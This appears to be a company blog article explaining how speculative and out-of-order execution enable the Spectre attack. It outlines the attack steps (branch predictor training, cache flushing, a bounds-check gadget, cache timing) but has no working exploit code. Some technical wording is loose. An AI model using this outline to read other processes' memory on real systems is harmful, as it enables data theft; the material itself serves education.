At the beginning of 2018, the IT world was shocked by information that almost every processor manufactured within the last 20 years has security gaps that allow unauthorised programs to read private data.
Every processor working in our computer has a separate storage pool (virtual addresses) which is solely dedicated to it. Virtual addresses from this storage pool are translated into addresses in physical memory (which is typical for every process) through Page Table.
Every process has its Page Table for translating virtual addresses into physical addresses. When a processor changes context, meaning when it starts to execute another process, it also loads the Page Table appropriate for that process.
Thanks to this, we obtain isolation of processes, meaning that, theoretically, one process should not have access to memory dedicated for another process. The word “theoretically” is crucial here, because by using the security gaps described in this article, we can create a script that will be able to read memory dedicated to another process.
This situation is possible because of a few characteristics implemented in new processors. In particular, I mean: Out Of Order Execution, Speculative Execution and Caching. But… let’s slow down a bit.
Understand Out Of Order Execution
Simply speaking, while running a program, the processor goes through instructions one by one, executing them in the order they were put in the source code. But because programs are more and more complicated, and processors are more and more powerful, many methods have been developed to boost execution of programs. Modern processors try to execute as many instructions as possible in advance. Because of that, they will be ready to return the outcome when it comes to the execution of instructions.
The results of instructions executed by a processor in advance are sent to a unique component called Reorder Buffer, and there they wait peacefully until they can be used, when a program executes them.
What is Speculative Execution?
It often happens that we put conditional instructions into our code, then the flow of our program’s execution diverges. Depending on data provided in real time, a program can perform different sets of instructions. By executing Out Of Order instructions, the processor is trying to predict the result of executing the conditional instruction, and it executes code in advance so that results are available for the future.
The processor saves the results of executing conditional instructions in special BTB (Branch Target Buffer) table, and it collects statistical data which will help to predict the jump better.
Let’s talk about the details:
- The processor creates some kind of a checkpoint when it encounters a jump instruction.
- The processor makes a jump prediction and based on it, it executes the instructions of the proper conditional block, leaving results in Reorder Buffer for the future.
- When program execution reaches this conditional instruction, and its result is already known, the processor checks if its prediction was correct.
If the prediction was correct, the results of the next instructions will be returned directly from cache. Thanks to this, we have improved performance.
B. If the prediction was wrong, then the processor deletes all results from the buffer up to the checkpoint.
Cache is the key
Because RAM is relatively slow, the processor loses time needed to download the data it is referring to. Because of this, today’s processors have their own cache memory, which is several times faster than RAM. The processor uploads data that it will most likely need in the nearest future to the cache memory. Thanks to this, it saves the time required to download this data from RAM.
Is protected memory really protected?
In a standard situation, the processor checks if a given process is authorised to refer to particular memory cell. It also ensures that none of the processors will refer directly to physical memory. However, such a check takes time, and the processor must consume valuable fractions of seconds for this operation.
Because of this, in the case of Out Of Order execution, such a check is not performed for optimisation purposes. And that’s what makes attacks like Spectre and Meltdown possible.
Let’s start by discussing step-by-step how Spectre works. This attack allows us to read memory available to another process. This gap concerns almost every modern processor, irrespective of the manufacturer. It doesn’t matter whether someone uses a processor from Intel, AMD or ARM (for mobile devices) because they are equally vulnerable.
The problem occurs due to two lines of code, which you can see below. Let’s assume that we want to read the memory of a program that contains this part of code or is part of a script that we can insert into this process.
if(x < array1_size)
y = array2[array1[x]]
The first step we need to take is to train BTB (Branch Target Buffer). As I wrote earlier, BTB contains statistical information which is used by a processor to predict a jump in the case of Speculative Execution. What we want is to execute the above code by repeatedly giving the correct value of “x” so that the condition will be fulfilled. Then the processor will “get used to” it, and in the next prediction for that condition, it will predict that this condition will be fulfilled.
In the next step, we need to ensure that the processor cache is empty. In the case of x86 processors, we can trigger the “clflush” instruction, which will accomplish this.
Then, we can move to the real attack by giving a value of x lying outside of the range of array1, in a place which is typically impossible to read.
Of course, the condition that checks if the value of x is smaller than the table size will return “false”, but before that, the processor will probably execute instructions in advance using our prepared “x” in Out Of Order mode. In such a case, there won’t be an exception because, in Out Of Order mode, the processor doesn’t check if we went beyond the range of the table.
Let’s assume that the Array1 table is a char type table, and a single char weighs one byte. Because of that, the Array1[x] expression will return one byte of the memory to which we didn’t have access before. This sounds great, but how can we read this single byte of memory? Let’s have a closer look at the code responsible for the attack. We can see the following construction:
y = array2[array1[x]]
We see here that we are trying to download an element from the array2 table with an index equal to the value of one byte of the memory that we have “illegally” read. The effect of this operation is that the proper element of the array2 table will go to the cache memory of the processor.
We succeeded in leading to a situation in which the element of the array2 table, with an index equal to the value of the byte of information that was read from virtual memory, is in the cache memory. We didn’t have such access to it earlier, but now we do.
To finish the work, we need to find out the value of this element’s index from the array2 table that is allocated to the CPU cache. We can achieve this by iterating through every element of the array2 table and checking the access time to various elements. If an element is in the cache memory, it will be returned to us much faster than others because cache memory is much faster then RAM.
In the result, we read one byte of the virtual memory of the process to which we didn’t have access before. Going further, by incrementing the value of “x” with every attack iteration, we can read the whole virtual memory of the process, byte by byte.
Find out more Mariusz’s text here: https://softwarehut.com/blog/author/mariusz-dobrowolski/